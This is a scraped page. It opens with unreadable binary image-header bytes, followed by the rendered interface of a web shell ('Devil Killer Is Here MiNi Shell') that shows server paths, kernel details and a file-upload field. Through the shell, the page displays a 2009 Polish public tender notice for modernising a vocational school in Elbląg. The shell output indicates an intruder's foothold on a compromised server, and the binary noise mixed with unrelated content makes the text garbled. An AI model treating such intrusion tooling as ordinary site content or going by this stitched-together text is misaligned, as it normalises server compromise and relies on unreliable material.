JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090417/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090417/109396-N-2009.html

<p class="kh_header"><b>Elbląg: Budowa, rozbudowa i unowocześnienie bazy szkolnictwa zawodowego, 
gastronomiczno-hotelarskiego, z uwzględnieniem dostosowania do standardów unijnych w Zespole Szkół Gospodarczych w Elblągu</b><br>
<b>Numer ogłoszenia: 109396 - 2009; data zamieszczenia: 17.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina - Miasto Elbląg , ul. Łączności 1, 82-300 Elbląg, woj. warmińsko-mazurskie, tel. 055 235 35 36, 055 239 31 25, faks 055 235 35 55, 055 239 33 34.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umelblag.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa, rozbudowa i unowocześnienie bazy szkolnictwa zawodowego, 
gastronomiczno-hotelarskiego, z uwzględnieniem dostosowania do standardów unijnych w Zespole Szkół Gospodarczych w Elblągu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest:
Budowa, rozbudowa i unowocześnienie bazy szkolnictwa zawodowego, 
gastronomiczno-hotelarskiego, z uwzględnieniem dostosowania do standardów unijnych
 w Zespole Szkół Gospodarczych w Elblągu

Przedmiot główny:
Nazewnictwo wg CPV: Roboty budowlane w zakresie szkół średnich

Przedmiotem zamówienia jest wykonanie robót budowlanych oraz dostawa i montaż wyposażenia w modernizowanych pomieszczeniach Zespołu Szkół Gospodarczych zlokalizowanego przy ul. Królewieckiej 128 w Elblągu w ramach Projektu Budowa, rozbudowa i unowocześnienie bazy szkolnictwa zawodowego, gastronomiczno-hotelarskiego, z uwzględnieniem dostosowania do standardów unijnych w Zespole Szkół Gospodarczych w Elblągu.

2.	Zamawiający informuje, że niniejsze zamówienie dotyczy projektu pod nazwą Budowa, rozbudowa i unowocześnienie bazy szkolnictwa zawodowego, gastronomiczno-hotelarskiego, z uwzględnieniem dostosowania do standardów unijnych w Zespole Szkół Gospodarczych w Elblągu, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Warmia i Mazury na lata 2007-2013 (oś priorytetowa 3. Infrastruktura społeczna, działanie 3.1. Inwestycje w infrastrukturę edukacyjną).

3.	Przedmiot zamówienia opisuje dokumentacja projektowa oraz specyfikacje techniczne wykonania i odbioru robót budowlanych, opracowane przez Pracownię Projektową mgr inż. arch. Maria Landowska, z siedzibą: 83-200 Starogard Gdański, ul. Kleeberga 77, objęte I ETAPEM realizacji inwestycji:
A. DOKUMENTACJA PROJEKTOWA - PRZEDMIARY:
a.	Temat:	Przebudowa Zespołu Szkół Gospodarczych przy ul. Królewieckiej w Elblągu
	Adres	ul. Królewiecka 128 ELBLĄG
	Branża	ETAP I - 1. Przedmiar - Roboty budowlane
b.	Temat:	Przebudowa Zespołu Szkół Gospodarczych przy ul. Królewieckiej w Elblągu
	Adres	ul. Królewiecka 128 ELBLĄG
	Branża	ETAP I - 2. Przedmiar - Instalacje wod.-kan., c.o. I gaz
c.	Temat:	Przebudowa Zespołu Szkół Gospodarczych przy ul. Królewieckiej w Elblągu
	Adres	ul. Królewiecka 128 ELBLĄG
	Branża	ETAP I - 3. Przedmiar - instalacja wentylacji mechanicznej
d.	Temat:	Przebudowa Zespołu Szkół Gospodarczych przy ul. Królewieckiej w Elblągu
	Adres	ul. Królewiecka 128 ELBLĄG
	Branża	ETAP I - 4. Przedmiar -przyłącza wod.-kan. i kanalizacji deszczowej i sanitarnej
e.	Temat:	Przebudowa Zespołu Szkół Gospodarczych przy ul. Królewieckiej w Elblągu
	Adres	ul. Królewiecka 128 ELBLĄG
	Branża	ETAP I - 5. Przedmiar - Drogi, parkingi, boisko
f.	Temat:	Przebudowa Zespołu Szkół Gospodarczych przy ul. Królewieckiej w Elblągu
	Adres	ul. Królewiecka 128 ELBLĄG
	Branża	ETAP I - 6. Przedmiar - Ogrodzenie
g.	Temat:	Przebudowa Zespołu Szkół Gospodarczych przy ul. Królewieckiej w Elblągu
	Adres	ul. Królewiecka 128 ELBLĄG
	Branża	ETAP I - 7. Przedmiar - Zieleń
h.	Temat:	Przebudowa Zespołu Szkół Gospodarczych przy ul. Królewieckiej w Elblągu
	Adres	ul. Królewiecka 128 ELBLĄG
Branża	ETAP I - 8. Przedmiar - Wyposażenie pracowni sensorycznej, mikrobiologicznej, chemicznej, audiowizualnej
i.	Temat:	Przebudowa Zespołu Szkół Gospodarczych przy ul. Królewieckiej w Elblągu
	Adres	ul. Królewiecka 128 ELBLĄG
	Branża	ETAP I - 9. Przedmiar - Wyposażenie - sprzęt drobny
j.	Temat:	Przebudowa Zespołu Szkół Gospodarczych przy ul. Królewieckiej w Elblągu
	Adres	ul. Królewiecka 128 ELBLĄG
	Branża	ETAP I - 10. Przedmiar - Wyposażenia - pracownie hotelarskie
k.	Temat:	Przebudowa Zespołu Szkół Gospodarczych przy ul. Królewieckiej w Elblągu
	Adres	ul. Królewiecka 128 ELBLĄG
	Branża	ETAP I - 11. Przedmiar - Wyposażenie technologiczne
l.	WYPOSAŻENIE TECHNOLOGICZNE - SANITARIATY - przedmiar
Nazwa inwestycji: Przebudowa Zespołu Szkół Gospodarczych 
	Adres inwestycji:	ul. Królewiecka 128; 82-300 ELBLĄG
m.	Temat:	Przebudowa Zespołu Szkół Gospodarczych przy ul. Królewieckiej 128 w Elblągu
	Adres	ul. Królewiecka 128 ELBLĄG dz. nr 169
	Branża	ELEKTRYCZNA Przedmiar robót
n.	Temat:	Przebudowa Zespołu Szkół Gospodarczych przy ul. Królewieckiej w Elblągu
	Adres	ul. Królewiecka 128 ELBLĄG
	Branża	ETAP I - 13. Przedmiar - renowacja majoliki w pracowni restauracyjnej
o.	Temat:	Przebudowa Zespołu Szkół Gospodarczych przy ul. Królewieckiej w Elblągu
	Adres	ul. Królewiecka 128 ELBLĄG
Branża	ETAP I - 15. Przedmiar - Instalacja odwodnienia placów postojowo-manewrowych i dróg wewnętrznych

Przedmiary robót stanowią ZAŁĄCZNIK Nr 5 do SIWZ.

B. DOKUMENTACJA PROJEKTOWA - PROJEKTY:
a.	Temat: Przebudowa Zespołu Szkół Gospodarczych przy ul. Królewieckiej w Elblągu
Adres: ul. Królewiecka 128 ELBLĄG dz. nr 169
Branża: PROJEKT MAŁEJ ARCHITEKTURY Projekt budowlany i wykonawczy I ETAP
b.	Temat: Przebudowa Zespołu Szkół Gospodarczych przy ul. Królewieckiej w Elblągu
Adres: Elbląg Ul. Królewiecka 128 
Branża: ETAP I DROGOWA Projekt zjazdu z ulicy Szymanowskiego do działki nr 169 w Elblągu PB i PW
c.	Przebudowa Zespołu Szkół Gospodarczych przy ul. Królewieckiej w Elblągu
Adres: ul. Królewiecka 128 ELBLĄG
Branża: ETAP I KONSTRUKCJA Projekt budowlany i wykonawczy 
d.	Temat: Przebudowa Zespołu Szkół Gospodarczych przy ul. Królewieckiej w Elblągu
Adres: ul. Królewiecka 128 ELBLĄG
Branża: DROGOWA, ETAP I, Projekt utwardzenia placów i dróg wewnętrznych, Projekt budowlany i wykonawczy
e.	Przebudowa Zespołu Szkół Gospodarczych przy ul. Królewieckiej w Elblągu
Adres: ul. Królewiecka 128 ELBLĄG
Branża: ETAP I, BOISKO, BIEŻNIA, SKOCZNIA, Projekt budowlany i wykonawczy
f.	Temat: Przebudowa Zespołu Szkół Gospodarczych przy ul. Królewieckiej w Elblągu
Adres: ul. Królewiecka 128 ELBLĄG dz., nr 169
Branża: TECHNOLOGIA I ETAP - Projekt zamienny, Projekt budowlany i wykonawczy
g.	Temat: Przebudowa Zespołu Szkół Gospodarczych przy ul. Królewieckiej w Elblągu
Adres: ul. Królewiecka 128 ELBLĄG dz. nr 169
Branża: ARCHITEKTURA I ETAP Projekt budowlany i wykonawczy
h.	Temat: Przebudowa Zespołu Szkół Gospodarczych przy ul. Królewieckiej w Elblągu
Adres: ul. Królewiecka 128 ELBLĄG dz. nr 169
Branża: PROJEKT ZAGOSPODAROWANIA TERENU Projekt budowlany i wykonawczy 
I ETAP 
i.	Temat: Przebudowa Zespołu Szkół Gospodarczych przy ul. Królewieckiej w Elblągu
Adres: ul. Królewiecka 128 ELBLĄG dz. nr 169
Branża: Projekt budowlany i wykonawczy PROJEKT ZIELENI ETAP I
j.	Przebudowa Zespołu Szkół Gospodarczych przy ul. Królewieckiej w Elblągu
Adres: ul. Królewiecka 128 ELBLĄG
Branża: ETAP I PROJEKT BUDOWY INSTALACJI WODOCIĄGOWEJ, KANALIZACJI SANITARNEJ Projekt budowlany i wykonawczy
k.	Temat: Przebudowa Zespołu Szkół Gospodarczych przy ul. Królewieckiej w Elblągu
Adres: ul. Królewiecka 128 ELBLĄG
Branża: Instalacja wentylacji ETAP I Projekt budowlany i wykonawczy
l.	Przebudowa Zespołu Szkół Gospodarczych przy ul. Królewieckiej w Elblągu
Adres: ul. Królewiecka 128 ELBLĄG
Branża: PROJEKT INSTALACJI WENTYLACJI W PRACOWNIACH HOTELARSKICH Projekt budowlany i -wykonawczy-
m.	Temat: Przebudowa Zespołu Szkół Gospodarczych przy ul. Królewieckiej w Elblągu
Adres: ul. Królewiecka 128 ELBLĄG
Branża: ETAP I Instalacja wewnętrzna gazu Projekt budowlany i wykonawczy
n.	Przebudowa Zespołu Szkół Gospodarczych przy ul. Królewieckiej w Elblągu
Adres: ul. Królewiecka 128 ELBLĄG
Branża: ETAP I PROJEKT BUDOWY PRZYŁĄCZA WODOCIĄGOWEGO ORAZ PRZYKANALIKA KANALIZACJI SANITARNEJ i DESZCZOWEJ Projekt budowlany i wykonawczy
o.	Temat: Przebudowa Zespołu Szkół Gospodarczych przy ul. Królewieckiej w Elblągu
Adres: ul. Królewiecka 128 ELBLĄG
Branża: Instalacja odwodnienia placów postojowo-manewrowych i dróg wewnętrznych Projekt budowlany i wykonawczy ETAP I
p.	Temat: Przebudowa Zespołu Szkół Gospodarczych przy ul. Królewieckiej w Elblągu
Adres: ul. Królewiecka 128 ELBLĄG dz. nr 169
Branża: ELEKTRYCZNA I ETAP Projekt budowlany i wykonawczy
q.	Przebudowa Zespołu Szkół Gospodarczych przy ul. Królewieckiej w Elblągu
Adres: ul. Królewiecka 128 ELBLĄG
Branża: ETAP I PROJEKT BUDOWY INSTALACJI CENTRALNEGO OGRZEWANIA Projekt budowlany i wykonawczy
r.	Temat: Przebudowa Zespołu Szkół Gospodarczych przy ul. Królewieckiej w Elblągu
Adres: ul. Królewiecka 128 ELBLĄG dz. nr 169
Branża: PROGRAM PRAC KONSERWATORSKICH ETAP I + II etap

C. SPECYFIKACJE TECHNICZNE WYKONANIA I ODBIORU ROBÓT BUDOWLANYCH:
a.	Temat: Przebudowa Zespołu Szkół Gospodarczych przy ul. Królewieckiej w Elblągu
Adres: ul. Królewiecka 128 ELBLĄG
Branża: ETAP I - Specyfikacja wykonania i odbioru robót sanitarnych
b.	Temat: Przebudowa Zespołu Szkół Gospodarczych przy ul. Królewieckiej w Elblągu
Adres: ul. Królewiecka 128 ELBLĄG
Branża: ETAP I - Specyfikacja wykonania i odbioru robót budowlanych
c.	Temat: Przebudowa Zespołu Szkół Gospodarczych przy ul. Królewieckiej 128 w Elblągu
Adres: ul. Królewiecka 128 ELBLĄG dz. nr 169
Branża: ELEKTRYCZNA Specyfikacja techniczna

Dokumentacja projektowa wymieniona w pkt B. oraz specyfikacje techniczne, o których mowa w pkt C., stanowią ZAŁĄCZNIK Nr 6 do SIWZ.

4.	Dane techniczne budynku:
a)	Powierzchnia zabudowy:		 	- 2.135,55 m2,
w istniejąca: 				- 2.101,58 m2,

b)	Kubatura: 					- 30.856 m3,
w istniejąca: budynku szkoły		- 28.901 m3,
budynku prac. hotel.		-   1.585 m3,
RAZEM					- 30.486 m3

c)	Projektowana rozbudowa			- 370 m3,

d)	Budynek główny
Powierzchnia: 	brutto		użytkowa
piwnice		   304,40 m2	   240,28 m2
parter		1.632,38 m2	1.462,26 m2
I piętro		1.151,63 m2	   957,31 m2
II piętro		1.160,23 m2	   999,56 m2
poddasze		   889,36 m2	   773,78 m2
Razem: 		5.138,00 m2	4.433,19 m2

e)	Budynek pracowni hotelarskich
Powierzchnia: 	brutto		użytkowa
piwnice		108,58 m2	100,24 m2
parter		108,51 m2	  86,43 m2
I piętro		100,94 m2	  87,07 m2
poddasze		  75,90 m2	  62,15 m2
Razem:		405,41 m2	335,89 m2

5.	Opis ogólny budynku i terenu szkoły:
Obiekt zlokalizowany jest w rejonie skrzyżowania ul. Królewieckiej z ul. Szymanowskiego w Elblągu. Jest to kompleksowy obiekt szkolny w zabudowie wolnostojącej. Budynek składa się z trzech członów:
-	budynku głównego posiadającego trzy kondygnacje, poddasze użytkowe, częściowo podpiwniczonego - budynek pełni funkcję szkoły z uzupełniającą stołówką z kuchnią,
-	budynku Sali gimnastycznej parterowej z nieużytkowym poddaszem,
-	budynku administracyjnego - dwukondygnacyjnego z poddaszem, podpiwniczonego.
Wszystkie trzy człony są ze sobą połączone komunikacją wewnętrzną.

6.	Zamawiający zaleca, aby Wykonawca dokonał wizji lokalnej w celu zapoznania się z zakresem prac i warunkami ich wykonania.

7.	Zamawiający informuje, że powołał Inżyniera Kontraktu. Zamawiający powierzył Inżynierowi Kontraktu zarządzanie i nadzór nad realizacją robót, stanowiących przedmiot zamówienia, w celu skutecznego wyegzekwowania od Wykonawcy wymagań dotyczących jakości stosowanych materiałów i robót, kosztów realizacji robót oraz wykonania obiektu zgodnie z dokumentacją projektową, w ustalonym w umowie z Wykonawcą robót terminie.

8.	W przypadku składania zabezpieczenia należytego wykonania umowy w formie gwarancji Wykonawca będzie zobowiązany do złożenia ich w formie zgodnej ze wzorami stanowiącymi ZAŁĄCZNIK Nr 4 do SIWZ.

9.	Wykonawca zobowiązany będzie do zawarcia umów z podwykonawcami, zgodnie z postanowieniami art. 647 ze znaczkiem 1 - Kodeksu cywilnego.

10.	Wykonawca zobowiązany będzie do zawarcia umów przelewu wierzytelności na rzecz podwykonawców, należnych im za wykonane roboty.

11.	W przypadku wygrania przetargu Wykonawca zobowiązany będzie do ubezpieczenia budowy od mogących wystąpić szkód, nagłych zdarzeń losowych oraz od odpowiedzialności cywilnej. Wykonawca przed przystąpieniem do wykonania przedmiotu zamówienia przedłoży polisy lub inne dokumenty ubezpieczenia, potwierdzające zawarcie ubezpieczenia na okres od dnia rozpoczęcia do dnia ukończenia robót, obejmującego:
-	ubezpieczenie robót, urządzeń i sprzętu budowlanego do wysokości 100% umownego wynagrodzenia,
-	ubezpieczenie osób trzecich.

12.	W przypadku wygrania przetargu Wykonawca sporządzi harmonogram rzeczowo-finansowy wykonania robót objętych umową i przedłoży do zatwierdzenia w terminie 7 dni od dnia udzielenia zamówienia.

13.	W przypadku konieczności zajęcia pasa drogowego w celu prowadzenia robót, Wykonawca będzie zobowiązany do opracowania projektu organizacji ruchu drogowego na czas prowadzenia robót, który po zaopiniowaniu przez Komendę Miejską Policji w Elblągu oraz zatwierdzeniu przez organ zarządzający ruchem drogowym (Zarząd Dróg UM w Elblągu), winien zostać złożony wraz ze stosownym wnioskiem do zarządcy drogi.
Wykonawca będzie pokrywał koszty z tytułu zajęcia pasa drogowego wg stawek pomniejszonych o 80% dla inwestycji realizowanych przy udziale środków Gminy Miasto Elbląg, zgodnie z uchwałą Nr XXII/511/2005 Rady Miejskiej w Elblągu z dnia 14.05.2005r. w sprawie ustalenia stawek opłat za zajęcie pasa drogowego na cele niezwiązane z budową, przebudową, remontem, utrzymaniem i ochroną dróg publicznych w granicach administracyjnych miasta Elbląga.

14.	Roboty muszą być prowadzone pod nadzorem konserwatorskim i archeologicznym.

15.	Robotami budowlanymi może kierować tylko osoba, która spełnia wymagania określone w § 8 ust. 1 Rozporządzenia Ministra Kultury z dnia 9 czerwca 2004r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych (Dz.U. Nr 150, poz. 1579).

16.	Prace konserwatorskie będą prowadzić osoby spełniające wymagania określone w § 7 ust. 1 i 2 Rozporządzenia Ministra Kultury z dnia 9 czerwca 2004 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych.

17.	Zamawiający wymaga, aby odpady powstałe w wyniku realizacji robót były przetransportowane i zmagazynowane w miejscu unieszkodliwienia odpadów. Wykonawca będzie zobowiązany do przedstawienia Zamawiającemu stosownych dokumentów. 

18.	W cenie oferty należy uwzględnić koszty:
- 	wykonania i zamontowania tablicy informacyjnej na czas budowy, informującej o uczestnictwie Unii Europejskiej w finansowaniu inwestycji,
-	wykonania i zamontowania tablicy pamiątkowej informującej o wsparciu finansowym przez Unię Europejską.
W związku z tym, iż zamówienie jest współfinansowane ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Warmia i Mazury na lata 2007-2013, Wykonawca zobowiązany będzie realizować wytyczne dotyczące promocji i informacji zawarte w opracowaniu wykonanym na zamówienie Urzędu Marszałkowskiego Województwa Warmińsko-Mazurskiego zatytułowanym Obowiązki beneficjentów w zakresie prowadzenia działań informacyjnych i promocyjnych projektów współfinansowanych ze środków Unii Europejskiej. W szczególności dotyczy to obowiązku wykonania i umieszczenia przez Wykonawcę stosownych tablic: informacyjnej i pamiątkowej, a także plakietek informacyjnych, informujących o zakresie realizowanego projektu i wsparciu ze środków Europejskiego Funduszu Rozwoju Regionalnego. Wykonawca zobowiązany będzie uzgodnić z Zamawiającym projekt tablic: informacyjnej i pamiątkowej. Wzory tablic dostępne są pod linkiem: 
http://www.rpo.warmia.mazury.pl/index.php?page=dzial&dzial_id=177

19.	Zamawiający wymaga, aby Wykonawca udzielił Zamawiającemu gwarancji na okres 39 miesięcy, licząc od daty odbioru robót.
20.	Informacja o przewidywanych zmianach postanowień zawartej umowy w stosunku do treści oferty, na podstawie której Zamawiający dokona wyboru Wykonawcy:
1. 	Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy.
2.	Zamawiający określa następujące warunki, w jakich przewiduje możliwość dokonania zmian zawartej umowy:
a)	Konieczność przedłużenia terminu umownego z powodu:
- działania siły wyższej, tj. wyjątkowego zdarzenia lub okoliczności,
- z przyczyn zależnych od Zamawiającego.
Nie uważa się za czynnik zakłócający wpływ czynników atmosferycznych w czasie realizacji robót, który przy składaniu ofert musi być normalnie brany pod uwagę (wyjątek stanowią przeszkody atmosferyczne o charakterze katastrof).
b)	Zmiana finansowania robót w poszczególnych latach związana ze zmianą budżetu, otrzymaniem dotacji, pożyczek lub innych środków uzyskanych z zewnątrz.
c)	Ograniczenie zakresu robót wynikające z braku środków finansowych Zamawiającego.
d)	Ograniczenie zakresu robót wynikających z wprowadzenia zmian istotnych lub nieistotnych w rozumieniu Prawa budowlanego.
e)	Konieczność wykonania dodatkowych badań, ekspertyz, analiz itp.
f)	     Konieczność wykonania robót zamiennych, niewykraczających poza zakres przedmiotu zamówienia, których wprowadzenie będzie konieczne dla wykonania całości robót i uzyskania założonego efektu użytkowego.
g)	Zmiana przepisów, które skutkują zmianą pozwolenia na budowę wydanego dla realizowanego zamówienia.
h)	Likwidacja lub rozwiązanie firmy Wykonawcy.
i)	     Konieczność wykonania prac wynikających z zaleceń organów uprawnionych, np. nadzoru budowlanego, PIP, itp.
j)	    Zwiększenie lub zmniejszenie ilości robót wynikające z rzeczywistych obmiarów.
k)	Zmiana inspektora nadzoru, kierownika budowy, kierownika robót, koordynatora prac ze strony Zamawiającego.
l)	     Zmiana Podwykonawców robót.
m)	Zmiana danych podmiotowych Wykonawcy.
n)	Ustawowa zmiana stawki podatku VAT lub zmiana cen materiałów budowlanych w sytuacji łącznego spełnienia dwóch przesłanek:
-	gdy istnieje obiektywna konieczność wprowadzenia zmian, np. gdy spełnienie świadczenia byłoby połączone z nadmiernymi trudnościami albo groziłoby jednej ze stron rażącą stratą w rozumieniu art. 357 ze znaczkiem 1 Kodeksu cywilnego,
-	zmiana wynika z okoliczności, których nie można było przewidzieć w momencie zawarcia umowy.
3.	W przypadku żądania przedłużenia terminu umownego z przyczyn zależnych od Wykonawcy, zostanie przeprowadzona następująca procedura:
-	Wykonawca prześle Zamawiającemu projekt zmian do umowy (aneks) w terminie co najmniej 14 dni przed datą upływu terminu zakończenia umowy wraz z pisemnym uzasadnieniem,
-	Zamawiający udzieli pisemnej odpowiedzi lub odeśle podpisany aneks do umowy przed upływem terminu wykonania umowy.
4.	Warunkiem dokonania zmian postanowień zawartej umowy w formie aneksu do umowy jest zgoda obu stron wyrażona na piśmie pod rygorem nieważności zmiany.

21.	Zamawiający nie zastrzega w SIWZ, że część lub całość zamówienia nie może być powierzona podwykonawcom. Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom.

22.	Zamawiający nie przewiduje udzielenia zamówień uzupełniających.

23.	Zakres zamówienia obejmuje:
a)	Wykonanie robót budowlanych, w tym wykonanie:
-	robót ogólnobudowlanych, a w szczególności m.in.:
            -	utworzenie dziewięciu w pełni wyposażonych pracowni do kształcenia zawodowego, w tym:
                      -	trzech pracowni do szkolenia zawodowego kucharzy, techników żywienia i gospodarstwa domowego, dietetyków, organizatorów usług gastronomicznych,
                      -	dwóch pracowni do szkolenia zawodowego cukierników, w tym pracowni czekolady,
                      -	pracowni do nauki obsługi konsumentów w ramach szkolenia zawodowego techników żywienia i techników usług gastronomicznych oraz  kelnerów,
                      -	pracowni sensorycznej z wyposażeniem wraz z pomieszczeniem przygotowania próbek,
                      -	pracowni chemicznej z wyposażeniem,
                      -	pracowni mikrobiologicznej z wyposażeniem wraz z zapleczem,
           -	utworzenie pracowni dydaktyczno-audiowizualnej z wyposażeniem do teoretycznego szkolenia zawodowego oraz przeprowadzania instruktażu (wstępnego i końcowego) na zajęciach praktycznych realizowanych w kuchni profesjonalnej,
           -	utworzenie szatni dla uczniów i nauczycieli zawodu, pokoju śniadań z wyposażeniem i zapleczem sanitarnym,
           -	utworzenie węzła sanitarnego dla uczniów i nauczycieli,
           -	utworzenie pracowni kuchni profesjonalnej z wyposażeniem, wraz z zapleczem i ladą ekspozycyjno-eksploatacyjną oraz dźwigiem towarowym,
           -	utworzenie pracowni restauracyjnej połączonej z bufetem,
           -	utworzenie pracowni do szkolenia zawodowego hotelarzy z pokojami 1 i 2 osobowymi z zapleczem sanitarnym wraz z recepcją i zapleczem socjalnym, w piwnicy przewiduje się utworzenie pralni z maglem oraz magazyn żywności dla pracowni restauracyjnej,
           -	dostosowanie szkoły dla potrzeb osób niepełnosprawnych,
           -	przebudowa części administracyjnej na pracownie hotelarskie,
           -	wymiana stolarki okiennej i drzwiowej,
           -	rozbudowa budynku o łącznik prowadzący z zaplecza pracowni profesjonalnej do piwnicy budynku z pracowniami hotelarskimi,
           -	remont tarasu od strony boiska,
-	instalacji wod.-kan., c.o. węzła cieplnego i gazowej,
